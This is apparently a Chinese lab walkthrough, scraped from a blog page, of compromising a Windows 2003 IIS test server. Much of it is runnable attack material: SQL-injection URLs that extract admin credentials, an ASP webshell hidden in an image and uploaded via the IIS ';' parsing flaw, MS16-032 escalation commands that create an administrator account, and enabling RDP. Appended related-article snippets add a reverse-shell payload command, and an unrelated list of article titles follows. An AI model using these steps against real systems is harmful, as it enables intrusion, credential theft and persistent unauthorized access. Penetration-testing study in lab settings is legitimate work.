利用ms16-032提权并打开3389端口
利用ms16-032提权并打开3389端口
1、在VM中创建win 2003,在win2003上安装iis服务并开启服务
2、配置iis服务
3、上传源码及配置网站
给put文件设置权限,添加iis访问权限
设置默认访问页面 index.asp
web服务拓展允许pages
访问192.168.x.x
4、修改checksql文件进行sql注入
判断注入点
http://192.168.8.130/shownews.asp?id=275 and 1=1
http://192.168.8.130/shownews.asp?id=275 and1=2
存在注入点
用order by 字段数
http://192.168.8.130/shownews.asp?id=275 and 1=1 order by 10
对其进行手工注入
http://192.168.8.130/shownews.asp?id=275 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10 from admin
因为数据库是sccsql所以后面添加from XXX
可以得到回显点2,3,7,8,9,
http://192.168.8.130/shownews.asp?id=275 and 1=2 UNION SELECT 1,username,password,4,5,6,7,8,9,10 from admin
得到账户admin密码:admin
利用得到的账号密码登入后台
5、修改upload_photo.asp文件上传图片码用蚁剑连接
6、制作asp图片码
命令: copy 1.jpg/b+1.asp/a 2.jpg
上传图片码
上传文件名为123.asp;1.jpg 这里利用的是iis解析漏洞从左向右解析
解析文件
http://192.168.8.130/UploadFiles/123.asp;1.jpg
用蚁剑或者菜刀进行连接
7、上传cmd命令
8、上传ms16-032进行提权
命令:
查看权限 c:/put/pic/ms16-032.exe “whoami”
创建用户 c:/put/pic/ms16-032.exe “net user 123 123 /add”
将kzc提权到administrator组 c:/put/pic/ms16-032.exe “net localgroup administrator 123 /add”
9、上传3389.bat文件,开启3389端口
命令c:/put/pic/ms16-032.exe c:/put/pic/3389.bat
快捷打开远程连接命令 mstsc
10、标题下载360卫士打补丁包
关闭360卫士,对目标进行提权创建123账户失败
11、查看所有端口
命令:
netstat -ant
利用ms16-032提权并打开3389端口相关推荐
- 【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三:Raven-2(服务利用,udf提权)
- Stapler-1靶场详细教学(7种漏洞利用+5种提权)
目录 前言 简介 信息收集 0x00 主机发现 0x01 端口探测 0x02 信息收集-1 0x03 信息收集-2 0x04 漏洞利用-1 0x05 信息收集-3 0x06 漏洞利用-2 0x07 漏 ...
- 当Linux提权不能反弹Shell时利用metasploit进行提权
当LINUX提权反弹不了时.经常遇到这种情况 请出MSF .. 1 .生成WEBSHELL文件 msf > msfpayload php/reverse_php LHOST=你的IP LPORT ...
- mysql反弹提权_MySQL数据库反弹端口连接提权
[51CTO.com原创稿件]在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令.在一般的情况下,也就放弃了.但其实可以 ...
- 计算机 打开3389端口,3389端口修改和打开【图文教程】
电脑的应用,改变了人们以往的传统生活,也让我们的工作,信息交流变得越来越快捷和方便,不过电脑的一些功能,一般人还是捉摸不透的,特别是电脑自带的智能化的指令和端口,如果不懂的,等用到了,还真没办法使用, ...
- DOS下打开3389端口
打开:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections / ...
- 【数据库提权】- SQL Server提权
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以"低权限"身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限.比如 ...
- sqlserver提权失败_利用mssql模拟登录提权
0x01 前提 开发者有时为了满足某种需求,允许其他登录用户模拟高权限的用户,对于开发来说,一个再简单不过的功能.虽然严格意义上这不算个漏洞,但是这种配置不当一般可以用来提权. 0x02 复现 1.s ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
最新文章
- flask uwsgi nginx *504* Gateway Time ou解决办法
- python水平条形图_如何在Bokeh(Python)中绘制水平条形图
- 10月18号站立会议
- C# Cookie操作类
- Smart Link
- 【MobX】390- MobX 入门教程(上)
- C语言面试题之华为篇2(答案全)
- 卡巴斯基正版下载及授权激活(4.8号更新)
- Datawhale 零基础入门CV赛事-Task2 数据读取与数据扩增
- redis 获取类似key的所i有的值_高可用 Redis 分布式锁实施方案!
- 最小二乘支持向量机预测matlab实现,最小二乘支持向量机MATLAB程序,可分多类
- Stata做统计分析详细教材
- 什么是JRE(或J2RE)?
- 台式计算机如何双屏显示,台式计算机如何同时连接显示器和电视双屏显示器?...
- 我爱Ruby的三十七个理由
- DirectAdmin教程-初级
- Java:spring Value注解用法详解
- 攻防世界Web新手区题解
- C++右值引用与函数返回值
- 雪亮工程 视频分类总结
热门文章
- Ubuntu Gnome Shell 安装桌面主题numix
- 2022年全球及中国危险区域旋转编码器行业头部企业市场占有率及排名调研报告
- 通达OA工作流列表控件获取数据,JSON回传,参数保存txt文本
- 取消苹果arcade订阅操作步骤
- 整型数据的输入和输出。
- 计算机的未来功能,未来机器人,将具备越来越多的功能
- linux怎么日历写入文件夹,用c写的一个日历文件
- DRS.Technologies.Orca3D.v1.4.20170915.X64犀牛船舶设计
- [窗口操作] - 获取窗口菜单信息
- ubuntu设置ntp定时任务校时